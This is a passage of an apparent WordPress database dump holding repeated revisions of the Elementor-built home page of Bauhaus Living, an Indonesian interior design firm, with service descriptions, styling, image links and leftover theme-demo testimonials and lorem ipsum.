dan berkelas.</p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\n interior design consultant & contractor 							</h2>\n		<p>- Konsultasi perencanaan &amp; interior design</p><p>- Penyusunan Rencana Anggaran Belanja</p><p>- Produksi furniture dan pekerjaan sipil</p>		\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n	        				<h4>\n					Residential				</h4>\n		</a>\n					<p>\n				Kami memiliki keyakinan bahwa rumah adalah “Living Space” atau ruang hidup yang harus memberikan energi positif pada penghuninya. Setiap proyek residential merupakan usaha kami untuk mewujudkan ruang hidup yang selain nyaman juga mewakili kepribadian penghuninya.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n	        				<h4>\n					Commercial				</h4>\n		</a>\n					<p>\n				Menghadirkan ruang commercial yang tidak sekedar fungsional namun juga memiliki identitas serta nilai ekonomi adalah tantangan yang sering kami hadapi dalam proyek commercial.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n	        				<h4>\n					Office				</h4>\n		</a>\n					<p>\n				Pergeseran generasi telah mengubah ruang kantor menjadi ruang kolaborasi yang menjadi sumber inspirasi bagi karyawan di dalamnya.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n		</a>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why Bauhaus Living ?							</h2>\n							<p> Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas. </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Konsultasi gratis oleh team profesional\n									</li>\n								<li>\n										Interior design yang mewakili keunikan setiap klien\n									</li>\n								<li>\n										Design + Build Service menjadi kualitas pekerjaan \n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Kepuasan Pelanggan\n									100%\n				Kualitas Hasil dan Layanan\n									100%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"2560\" height=\"1920\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg 2560w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-300x225.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1024x768.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-768x576.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1536x1152.jpg 1536w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-2048x1536.jpg 2048w\" sizes=\"(max-width: 2560px) 100vw, 2560px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking\nabout retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">		\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-09-22 10:02:44','2023-09-22 10:02:44','',22,'https://bauhaus.futuremediatrix.com/?p=4920',0,'revision','',0),(4921,3,'2023-09-22 10:02:44','2023-09-22 10:02:44','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927c-scaled.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-1065.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-9402.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								WELCOME TO BAUHAUS							</h2>\n		<p>Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living!</p><p>Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.</p><p>Kami tidak hanya menciptakan desain interior yang estetis, tetapi juga mengubah ruang tempat tinggal atau tempat kerja Anda menjadi cerminan karakter dan selera pribadi Anda.</p><p>Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.</p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\n interior design consultant & contractor 							</h2>\n		<p>- Konsultasi perencanaan &amp; interior design</p><p>- Penyusunan Rencana Anggaran Belanja</p><p>- Produksi furniture dan pekerjaan sipil</p>		\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n	        				<h4>\n					Residential				</h4>\n		</a>\n					<p>\n				Kami memiliki keyakinan bahwa rumah adalah “Living Space” atau ruang hidup yang harus memberikan energi positif pada penghuninya. Setiap proyek residential merupakan usaha kami untuk mewujudkan ruang hidup yang selain nyaman juga mewakili kepribadian penghuninya.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n	        				<h4>\n					Commercial				</h4>\n		</a>\n					<p>\n				Menghadirkan ruang commercial yang tidak sekedar fungsional namun juga memiliki identitas serta nilai ekonomi adalah tantangan yang sering kami hadapi dalam proyek commercial.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n	        				<h4>\n					Office				</h4>\n		</a>\n					<p>\n				Pergeseran generasi telah mengubah ruang kantor menjadi ruang kolaborasi yang menjadi sumber inspirasi bagi karyawan di dalamnya.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n		</a>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why Bauhaus Living ?							</h2>\n							<p> Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas. </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Konsultasi gratis oleh team profesional\n									</li>\n								<li>\n										Interior design yang mewakili keunikan setiap klien\n									</li>\n								<li>\n										Design + Build Service menjadi kualitas pekerjaan \n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Kepuasan Pelanggan\n									100%\n				Kualitas Hasil dan Layanan\n									100%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"2560\" height=\"1920\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg 2560w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-300x225.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1024x768.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-768x576.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1536x1152.jpg 1536w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-2048x1536.jpg 2048w\" sizes=\"(max-width: 2560px) 100vw, 2560px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking\nabout retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">		\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-09-22 10:02:44','2023-09-22 10:02:44','',22,'https://bauhaus.futuremediatrix.com/?p=4921',0,'revision','',0),(4922,3,'2023-09-22 10:02:45','2023-09-22 10:02:45','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927c-scaled.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-1065.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-9402.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								WELCOME TO BAUHAUS							</h2>\n		<p>Tingkatkan Kualitas Hidup Anda dengan 